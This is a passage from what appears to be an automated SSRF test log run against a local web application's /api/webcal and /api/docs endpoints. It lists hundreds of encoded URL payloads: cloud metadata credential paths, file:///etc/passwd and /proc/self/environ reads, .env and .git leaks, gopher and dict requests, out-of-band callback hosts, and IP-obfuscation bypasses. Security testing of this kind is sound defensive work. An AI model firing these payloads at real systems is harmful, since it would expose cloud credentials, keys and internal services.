Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/webcal?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/webcal?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/webcal?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/webcal?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/webcal?url=0%2F` +- Testing: `http://localhost:4200/api/webcal?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/webcal?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/docs +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/docs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/docs?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/docs?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/docs?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/docs?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/docs?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/docs?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/docs?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/docs?url=127.1%3A80` +- Testing: `http://localhost:4200/api/docs?url=0` +- Testing: `http://localhost:4200/api/docs?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A80` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/docs?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/docs?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/docs?url=127.127.127.127` +- Testing: `http://localhost:4200/api/docs?url=127.0.1.3` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.0` +- Testing: `http://localhost:4200/api/docs?url=2130706433` +- Testing: `http://localhost:4200/api/docs?url=017700000001` +- Testing: `http://localhost:4200/api/docs?url=0x7f000001` +- Testing: `http://localhost:4200/api/docs?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/docs?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/docs?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/docs?url=google.com.localhost` +- Testing: `http://localhost:4200/api/docs?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/docs?url=localtest.me` +- Testing: `http://localhost:4200/api/docs?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/docs?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/docs?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/docs?url=2130706433%2F` +- Testing: `http://localhost:4200/api/docs?url=3232235521%2F` +- Testing: `http://localhost:4200/api/docs?url=3232235777%2F` +- Testing: `http://localhost:4200/api/docs?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/docs?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/docs?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/docs?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/docs?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/docs?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/docs?url=0%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1` +- Testing: `http://localhost:4200/api/docs?url=127.0.1` +- Testing: `http://localhost:4200/api/docs?url=localtest.me` +- Testing: `http://localhost:4200/api/docs?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/docs?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/docs?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/docs?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/docs?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/docs?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/docs?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/docs?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/docs?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.0.1.3` +- Testing: `http://localhost:4200/api/docs?url=0` +- Testing: `http://localhost:4200/api/docs?url=127.1` +- Testing: `http://localhost:4200/api/docs?url=127.0.1` +- Testing: `http://localhost:4200/api/docs?url=localhost` +- Testing: `http://localhost:4200/api/docs?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/docs?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/docs?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/docs?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/docs?url=7F000001` +- Testing: `http://localhost:4200/api/docs?url=2130706433` +- Testing: `http://localhost:4200/api/docs?url=6425673729` +- Testing: `http://localhost:4200/api/docs?url=127001` +- Testing: `http://localhost:4200/api/docs?url=127_0._0_1` +- Testing: `http://localhost:4200/api/docs?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/docs?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/docs?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/docs?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/docs?url=localtest.me` +- Testing: `http://localhost:4200/api/docs?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/docs?url=127.127.127.127` +- Testing: `http://localhost:4200/api/docs?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/docs?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=0x7f000001` +- Testing: `http://localhost:4200/api/docs?url=017700000001` +- Testing: `http://localhost:4200/api/docs?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/docs?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/docs?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/docs?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/docs?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/docs?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/docs?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/docs?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254` +- Testing: `http://localhost:4200/api/docs?url=2852039166` +- Testing: `http://localhost:4200/api/docs?url=7147006462` +- Testing: `http://localhost:4200/api/docs?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/docs?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/docs?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/docs?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/docs?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/docs?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/docs?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/docs?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/docs?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/docs?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/docs?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/docs?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/docs?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/docs?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/docs?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/docs?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/docs?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/docs?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/docs?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/docs?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/docs?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/docs?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/docs?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/docs?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/docs?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/docs?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/docs?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/docs?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.0` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/docs?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/docs?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/docs?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/docs?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/docs?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/docs?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/docs?url=3232235521` +- Testing: `http://localhost:4200/api/docs?url=3232235777` +- Testing: `http://localhost:4200/api/docs?url=425.510.425.510` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/docs?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/docs?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/docs?url=instance-data` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A22` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A443` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A80` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/docs?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/docs?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/docs?url=loopback` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A22` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A80` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A443` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/docs?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/docs?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/docs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/docs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/docs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/docs?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/docs?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/docs?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/docs?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/docs?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/docs?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/docs?url=127.1%3A80` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/docs?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/docs?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/docs?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/docs?url=2130706433%2F` +- Testing: `http://localhost:4200/api/docs?url=3232235521%2F` +- Testing: `http://localhost:4200/api/docs?url=3232235777%2F` +- Testing: `http://localhost:4200/api/docs?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/docs?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/docs?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: 